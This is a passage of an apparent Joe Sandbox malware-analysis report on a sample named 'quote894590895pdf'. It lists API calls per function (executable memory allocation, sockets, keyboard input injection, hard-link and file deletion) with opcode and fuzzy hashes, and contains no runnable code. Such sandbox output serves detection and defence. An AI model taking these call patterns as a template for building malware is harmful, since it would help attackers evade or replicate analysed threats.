                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: ea67aa063765bb1ff47a1baf857c7de0507e465c5b5364989dc17e97e79daa94
                                                                    • Instruction ID: 5d44b57ba190ec435d58bab2ebb5fa5ecc35b2b2e9f093a95beb77c959f1fe58
                                                                    • Opcode Fuzzy Hash: ea67aa063765bb1ff47a1baf857c7de0507e465c5b5364989dc17e97e79daa94
                                                                    • Instruction Fuzzy Hash: FCD0177051076BCFDB209F36C95868676E5AF04356B559C7EE48AF6160E6B0C8C0CA92
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00ED8E09,?,00EEF910), ref: 00ED9203
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00ED9215
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    • Opcode ID: 11c0d28bc2bc315732e080757417c64ae38c6ed8a037a7aba41159e36f9c46a8
                                                                    • Instruction ID: 06b03cf32b35a2ee842ff2a967a4df365d7b8f7dafddf447492ac9f4845bc2e6
                                                                    • Opcode Fuzzy Hash: 11c0d28bc2bc315732e080757417c64ae38c6ed8a037a7aba41159e36f9c46a8
                                                                    • Instruction Fuzzy Hash: 4FD0173055471BDFDB209F32ED4864676E5AF053A5B11D83EE886FA6A2EA70C881CA50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    • Opcode ID: 14218e12065ab9243d90b118374c74636c6818132d9967daa564dca969e48331
                                                                    • Instruction ID: 1c27e50159a382c8bbb1ee99b44a21e3c9c15e79bef55065e0fdd9b7bf6a3ee4
                                                                    • Opcode Fuzzy Hash: 14218e12065ab9243d90b118374c74636c6818132d9967daa564dca969e48331
                                                                    • Instruction Fuzzy Hash: 0AD01271849119EACB0496D198859FD737CAB0D700F146492F506F5080E365EB84AB62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d71587e0d33b6635d578ee9b1f26e2fd72d61b412b14b358815d6a80e6903f12
                                                                    • Instruction ID: 0274e1176c00337d6b8f7c926203ef3db46c70e1d6951aa63c6e9295c0424cfb
                                                                    • Opcode Fuzzy Hash: d71587e0d33b6635d578ee9b1f26e2fd72d61b412b14b358815d6a80e6903f12
                                                                    • Instruction Fuzzy Hash: 1FC15F74A04216EFCB14CFA8C884EAFB7B5FF88714B115599E885EB651DB30ED41CB90
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00EDE1D2
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00EDE215
                                                                      • Part of subcall function 00EDD8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EDD8D9
                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EDE415
                                                                    • _memmove.LIBCMT ref: 00EDE428
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                    • String ID:
                                                                    • API String ID: 3659485706-0
                                                                    • Opcode ID: bf92c9319349f2b94da747c4d0759c6a360f4883e0b71349abac052be436e7fc
                                                                    • Instruction ID: adc09a7dfd35c12b8b967b044c6bf7bf8acfc46cdeb8a8623f40d08c692246c2
                                                                    • Opcode Fuzzy Hash: bf92c9319349f2b94da747c4d0759c6a360f4883e0b71349abac052be436e7fc
                                                                    • Instruction Fuzzy Hash: 0CC16A716083019FC704EF28C48596ABBE4FF89718F14996EF899AB351D731E946CF82
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00ED81D8
                                                                    • CoUninitialize.OLE32 ref: 00ED81E3
                                                                      • Part of subcall function 00EBD87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EBD8E3
                                                                    • VariantInit.OLEAUT32(?), ref: 00ED81EE
                                                                    • VariantClear.OLEAUT32(?), ref: 00ED84BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    • Opcode ID: 9215346026ed72ea45385d3ec5e803b4d275cba91e653fe4c88ba055542f80d1
                                                                    • Instruction ID: 4bd1dd3534ebe58aaefdf7ba6ec2e520f709b33eb44a58e920638d2cdc9cac10
                                                                    • Opcode Fuzzy Hash: 9215346026ed72ea45385d3ec5e803b4d275cba91e653fe4c88ba055542f80d1
                                                                    • Instruction Fuzzy Hash: 35A127752047019FCB10DF14C991A6AB7E4FF88764F08A459F99AAB3A2CB30ED05CB46
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: 3e20397186f06e12c87d7e36460a334310809f835599abf36a8906ed27839937
                                                                    • Instruction ID: 607ee8392dfa226307233dcaef21b98671ea088a0d69a3cf0c55c586d2f9e980
                                                                    • Opcode Fuzzy Hash: 3e20397186f06e12c87d7e36460a334310809f835599abf36a8906ed27839937
                                                                    • Instruction Fuzzy Hash: 6A51B7307443029BDB20BF65D491AEBF3E5EF44314F20A82FE596FB6A1DB7898408B11
                                                                    APIs
                                                                      • Part of subcall function 00E65045: _fseek.LIBCMT ref: 00E6505D
                                                                      • Part of subcall function 00EC97DD: _wcscmp.LIBCMT ref: 00EC98CD
                                                                      • Part of subcall function 00EC97DD: _wcscmp.LIBCMT ref: 00EC98E0
                                                                    • _free.LIBCMT ref: 00EC974B
                                                                    • _free.LIBCMT ref: 00EC9752
                                                                    • _free.LIBCMT ref: 00EC97BD
                                                                      • Part of subcall function 00E82ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00E89BA4), ref: 00E82EE9
                                                                      • Part of subcall function 00E82ED5: GetLastError.KERNEL32(00000000,?,00E89BA4), ref: 00E82EFB
                                                                    • _free.LIBCMT ref: 00EC97C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    • Opcode ID: ead35348d636f3ff2df0a6b0ab6b2ad0c1c6d2d50f30e8c37486cf9aa4bb8d17
                                                                    • Instruction ID: bba63520a2fe6023002c529032dc099984db544be46bd354911218e3794645a2
                                                                    • Opcode Fuzzy Hash: ead35348d636f3ff2df0a6b0ab6b2ad0c1c6d2d50f30e8c37486cf9aa4bb8d17
                                                                    • Instruction Fuzzy Hash: 11515EB1A04218AFDF249F64DC85A9EBBB9EF48304F1014AEB60DB7241DB715A91CF58
                                                                    APIs
                                                                    • GetWindowRect.USER32(017CEFC0,?), ref: 00EE9895
                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00EE98C8
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00EE9935
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: 66e99503ece010310ae642b8e08688bc01a7adbe2579dd95890086c30fafbde3
                                                                    • Instruction ID: 11157aa39054ae395888fa483be3e6bc12936d41b377d8c1c61e1ab9167467ed
                                                                    • Opcode Fuzzy Hash: 66e99503ece010310ae642b8e08688bc01a7adbe2579dd95890086c30fafbde3
                                                                    • Instruction Fuzzy Hash: CF515D34A0024DAFCF24DF65D8809AE7BF6FF85324F109159F855AB2A2D771AD81CB90
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00ED6AE7
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED6AF7
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00ED6B5B
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00ED6B67
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                    • String ID:
                                                                    • API String ID: 2214342067-0
                                                                    • Opcode ID: 4637f5ddd0fa0366a271e1b89a671c4314f7f74bbf08d5516ca0ca8c943840b3
                                                                    • Instruction ID: a542bd30c1f04c0f66dae588a506b554d441e262a0d1569750323e413ffb46de
                                                                    • Opcode Fuzzy Hash: 4637f5ddd0fa0366a271e1b89a671c4314f7f74bbf08d5516ca0ca8c943840b3
                                                                    • Instruction Fuzzy Hash: D3419F35680200AFEB24AF24EC86F7A77E9EB04B54F049119FA59BF2D3DA719C018791
                                                                    APIs
                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EEF910), ref: 00ED65BD
                                                                    • _strlen.LIBCMT ref: 00ED65EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID:
                                                                    • API String ID: 4218353326-0
                                                                    • Opcode ID: 18085d21ac3d419a6bfcd3c43ee1fca8228f098f5e818013823d8e0326732bd6
                                                                    • Instruction ID: c617e0a8fa57f624e7d177a205a411193bdaa272d038de3505e49fea09fdec9a
                                                                    • Opcode Fuzzy Hash: 18085d21ac3d419a6bfcd3c43ee1fca8228f098f5e818013823d8e0326732bd6
                                                                    • Instruction Fuzzy Hash: 0541A071640104ABCB14EBA4E9D1EAEB3E9EF44354F14915AF929BB392DB30ED05CB50
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ECB92A
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00ECB950
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ECB975
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ECB9A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: 6af57750bf312a9f7ed12412cc472e929aacfce78f8d5f6b3a52d7514beac0d0
                                                                    • Instruction ID: d683147b09b29be50009d2baeadeedf54f8a843800a785b7fc3d67bcb0803a90
                                                                    • Opcode Fuzzy Hash: 6af57750bf312a9f7ed12412cc472e929aacfce78f8d5f6b3a52d7514beac0d0
                                                                    • Instruction Fuzzy Hash: C5413339600650DFCF10EF15D585E59BBE5EF89364B099088E98AAB362CB31FD01CB91
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EE8910
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 9d58e1ff7e95370386c14e673ba7f4629fef1f58007965652e644a0ca853f614
                                                                    • Instruction ID: f7a15c17db7fa7f6e2caf841a390e382d0e665c08332fa2db0419c0c4c612348
                                                                    • Opcode Fuzzy Hash: 9d58e1ff7e95370386c14e673ba7f4629fef1f58007965652e644a0ca853f614
                                                                    • Instruction Fuzzy Hash: 7031E330A0018CBFEF248E5ADE85BB837A1EB85314F506512FA5DF61E2CF3299409652
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 00EEAB92
                                                                    • GetWindowRect.USER32(?,?), ref: 00EEAC08
                                                                    • PtInRect.USER32(?,?,00EEC07E), ref: 00EEAC18
                                                                    • MessageBeep.USER32(00000000), ref: 00EEAC89
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: 7387fb735726ea63df13611e5d47e885aa6f729c6f7d9cb24e56764c512141d5
                                                                    • Instruction ID: 664814e78b7474839cd4be9e10c4584666ecd9250d174158a53d3f520b783629
                                                                    • Opcode Fuzzy Hash: 7387fb735726ea63df13611e5d47e885aa6f729c6f7d9cb24e56764c512141d5
                                                                    • Instruction Fuzzy Hash: 17417E3060059DDFCF21DF5AC884AA9BBF6FB48704F2890B9E414AB260D730B845DB92
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00EC0E58
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00EC0E74
                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00EC0EDA
                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00EC0F2C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: b1932cecc3d7b3eff5f96b94341c4b6a6af629d89efd635c15603c3d6f7f81bf
                                                                    • Instruction ID: 376ab3e53799201d5ff586c77e7b84a10f082ec54ac3cab6f4b4315c2432160c
                                                                    • Opcode Fuzzy Hash: b1932cecc3d7b3eff5f96b94341c4b6a6af629d89efd635c15603c3d6f7f81bf
                                                                    • Instruction Fuzzy Hash: 79316630A8025CEEFF308B258904FFA7BA5EB88324F08661EF190721D1C33689878751
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EC0F97
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EC0FB3
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00EC1012
                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EC1064
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 5b8af8b6a99b1860a0b06867d3dddbc225cc1f859dca84bb1be33f8e10d42a25
                                                                    • Instruction ID: 398a7f505649194fe2c1fbebab8f223d378f74a338a178610886ae6ee9cf9024
                                                                    • Opcode Fuzzy Hash: 5b8af8b6a99b1860a0b06867d3dddbc225cc1f859dca84bb1be33f8e10d42a25
                                                                    • Instruction Fuzzy Hash: 0F315C30A402D8DEFF348A658906FFE7BA6AB46314F04529EF491712D2C3768DC79761
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E9637B
                                                                    • __isleadbyte_l.LIBCMT ref: 00E963A9
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E963D7
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E9640D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 1d623e46b32bc205234eefd700783283c56734c6959356414641f55925e39724
                                                                    • Instruction ID: deaedf4627d384ff412e56e02ea9d177910d473141be1524c6afd5dc98ef3663
                                                                    • Opcode Fuzzy Hash: 1d623e46b32bc205234eefd700783283c56734c6959356414641f55925e39724
                                                                    • Instruction Fuzzy Hash: 1931AF31600286EFDF21DF75C885AAE7BB5FF81314F15502AE824AB1A1E731D850DB50
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00EE4F6B
                                                                      • Part of subcall function 00EC3685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EC369F
                                                                      • Part of subcall function 00EC3685: GetCurrentThreadId.KERNEL32 ref: 00EC36A6
                                                                      • Part of subcall function 00EC3685: AttachThreadInput.USER32(00000000,?,00EC50AC), ref: 00EC36AD
                                                                    • GetCaretPos.USER32(?), ref: 00EE4F7C
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00EE4FB7
                                                                    • GetForegroundWindow.USER32 ref: 00EE4FBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
